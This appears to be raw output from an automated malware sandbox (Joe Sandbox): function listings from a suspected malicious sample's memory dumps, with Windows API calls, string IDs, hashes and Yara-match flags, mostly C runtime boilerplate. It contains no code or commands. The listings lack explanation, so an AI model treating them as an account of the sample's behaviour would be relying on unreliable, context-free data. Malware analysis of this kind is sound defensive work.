                                            • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 04D1C041
                                            • ___TypeMatch.LIBVCRUNTIME ref: 04D1C14F
                                            • _UnwindNestedFrames.LIBCMT ref: 04D1C2A1
                                            • CallUnexpected.LIBVCRUNTIME ref: 04D1C2BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: fe37b52a138c66234dc58c2c57dbf8adf4859d91f14cd3f7c3d2d3cce7683f58
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: 91B18672A50219FFDF14DFA4E9809AEBBB4FF04B18B10405AEC116B221D335FA51CBA1
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04D19DE2), ref: 04D19E10
                                            • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04D19DE2), ref: 04D19E1B
                                            • GetModuleHandleW.KERNEL32(0042000C,?,?,04D19DE2), ref: 04D19E2C
                                            • GetProcAddress.KERNEL32(00000000,00420028), ref: 04D19E3E
                                            • GetProcAddress.KERNEL32(00000000,00420044), ref: 04D19E4C
                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04D19DE2), ref: 04D19E6F
                                            • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04D19E8B
                                            • CloseHandle.KERNEL32(0042D060,?,?,04D19DE2), ref: 04D19E9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                            • String ID:
                                            • API String ID: 2565136772-0
                                            • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction ID: 22f845b40643fe4987b5c43ccdb103c582b95a821cf866f0fb35c0adbdb04758
                                            • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction Fuzzy Hash: 1F0192B1B41711BBD7201BB0FC18B973AE8BB48B05F504072BD04E2171DB64D806CA69
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                            • Instruction ID: 4a21b80fcc43a582202c6f7144ab3ce64f52356938c116e7343db5097d41ee6d
                                            • Opcode Fuzzy Hash: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                            • Instruction Fuzzy Hash: 57B13672E003559FDB118F65CC81BEF7FA5EF59310F14416BE904AB382D2789A82C7A8
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction ID: e94a75514e73eab33028307fda844cb67d2109773b40d29a2a6e5659016f818a
                                            • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction Fuzzy Hash: 05B15372A00275AFEB12CF68CE81BAE7BA5FF65318F144155ED44AB281D274F901CBA0
                                            APIs
                                            • __RTC_Initialize.LIBCMT ref: 1000291D
                                            • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Initialize___scrt_uninitialize_crt
                                            • String ID:
                                            • API String ID: 2442719207-0
                                            • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                            • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                            • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                            • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B7F7
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B7FF
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B888
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8B3
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B908
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: 0a5d0bd6c222bbdd43f8b319fa79a96d429a9708f3c046b0ae0cbd11a01f7e51
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 11418535A00219DBCF10EF69C885A9EBBA5EF44318F14C17AE8147B3E2D7399905CBD9
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                            • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                            • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                            • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                            • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                            • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 0-537541572
                                            • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                            • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                            • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                            • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,00413448,00403597,?,00000000,00402809,0040280B,?,004135C1,00000022,FlsSetValue,00422950,00422958,00402809), ref: 004133FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 3664257935-537541572
                                            • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction ID: 89836d951bc72d4e20e2faa1a52db581b462940ce5fd44a8dff6846afbaeb460
                                            • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction Fuzzy Hash: A3212731B01214EBDB329F21DC44ADB7B68AB41765B200133ED15A73D1DA78EE46C6DC
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                            • __fassign.LIBCMT ref: 1000B905
                                            • __fassign.LIBCMT ref: 1000B922
                                            • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 1735259414-0
                                            • Opcode ID: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                            • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                            • Opcode Fuzzy Hash: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                            • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                            APIs
                                            • GetLastError.KERNEL32(?,?,0040B97B,0040AF1F,0040A730), ref: 0040B992
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9A0
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9B9
                                            • SetLastError.KERNEL32(00000000,0040B97B,0040AF1F,0040A730), ref: 0040BA0B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: c1383cefff0a9c77c0f6256a7d22d0577fd0bc713188e5814d490c4ea7085b9f
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 6D0192727197119EE63427B97CC6A6B2B94EB01778760033BF520752E2EB39480255CC
                                            APIs
                                            • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                            • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                            • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                            • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                            • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                            APIs
                                            • GetLastError.KERNEL32(?,?,04D1BBE2,04D1B186,04D1A997), ref: 04D1BBF9
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04D1BC07
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04D1BC20
                                            • SetLastError.KERNEL32(00000000,04D1BBE2,04D1B186,04D1A997), ref: 04D1BC72
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: 490cb07dfe9f68bf9e02c66ee26e16554e09e3aa753bf95eeac812cee1a72b16
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 0A01D832319211FEA7342BB9BCC5A6B2E55FB0177CB20023BED25A61F1EE6178026194
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004015D5
                                              • Part of subcall function 00409842: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040984E
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 0040160B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 00401642
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00401757
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID: string too long
                                            • API String ID: 2123813255-2556327735
                                            • Opcode ID: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                            • Instruction ID: 8b29ff92f67febe7d184f40cd986ab90276924f3587203b15f4be4e0e60d2281
                                            • Opcode Fuzzy Hash: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                            • Instruction Fuzzy Hash: 5E4127B1A00300ABD720AF759C8575BB7B8EF48354F24063AF91AE73D1E775AD0487A9
                                            APIs
                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CloseCreateOpenSleepValue
                                            • String ID: mixone
                                            • API String ID: 4111408922-3123478411
                                            • Opcode ID: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                            • Instruction ID: 36deb0a2def4af7d69c3889f60f670a394a8a5da25757ff3a02b89eea185ed5b
                                            • Opcode Fuzzy Hash: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                            • Instruction Fuzzy Hash: F3418571210108AFEB08DF58DC95BEE7B65EF08300F908229F955AB5D1D778E9848F58
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,92291A76,0040280B,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105B5
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004105C7
                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                            • Instruction ID: f4dd53f2cc94282f557b0741292325b7031a84366b21a1c3c136dd1e19965a8c
                                            • Opcode Fuzzy Hash: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                            • Instruction Fuzzy Hash: F501A271A44625FBDB128F80DC05BEEBBB9FB04B51F004536F811A22A0DBB8A944CB58
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                            • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                            • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                            • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                            • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                            APIs
                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                            • __alloca_probe_16.LIBCMT ref: 1000A736
                                            • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                            • __freea.LIBCMT ref: 1000A837
                                            • __freea.LIBCMT ref: 1000A843
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: __alloca_probe_16__freea$Info
                                            • String ID:
                                            • API String ID: 2330168043-0
                                            • Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                            • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                            • Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                            • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 1000B03B
                                            • __alloca_probe_16.LIBCMT ref: 1000B101
                                            • __freea.LIBCMT ref: 1000B16D
                                              • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                            • __freea.LIBCMT ref: 1000B176
                                            • __freea.LIBCMT ref: 1000B199
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                            • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                            • Opcode Fuzzy Hash: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                            • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 00415095
                                            • __alloca_probe_16.LIBCMT ref: 0041515E
                                            • __freea.LIBCMT ref: 004151C5
                                              • Part of subcall function 00413C79: RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                            • __freea.LIBCMT ref: 004151D8
                                            • __freea.LIBCMT ref: 004151E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                            • Instruction ID: def92c4ecd74f4627ee81fabb5ad5435351d3551a42f570b1979e48308b83863
                                            • Opcode Fuzzy Hash: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                            • Instruction Fuzzy Hash: 1A51B372A00646FFDB225FA1CC41FFB3AA9EF84754B25002FFD04D6251EA39CD918668
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 04D12D2F
                                            • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04D12D44
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04D12D52
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04D12D6D
                                            • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04D12D8C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                            • String ID:
                                            • API String ID: 2509773233-0
                                            • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                            • Instruction ID: 0f76adbb077188df71153009ea25e65a9bbd457eedd8e14f7a7a4c45e65c8241
                                            • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                            • Instruction Fuzzy Hash: 4B310335B00104BFDB149F58EC40FAAB7A9FF48300F4541E9EE05AB261DB72AD16CB94
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                            • String ID:
                                            • API String ID: 3136044242-0
                                            • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                            • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                            • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                            • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAA4
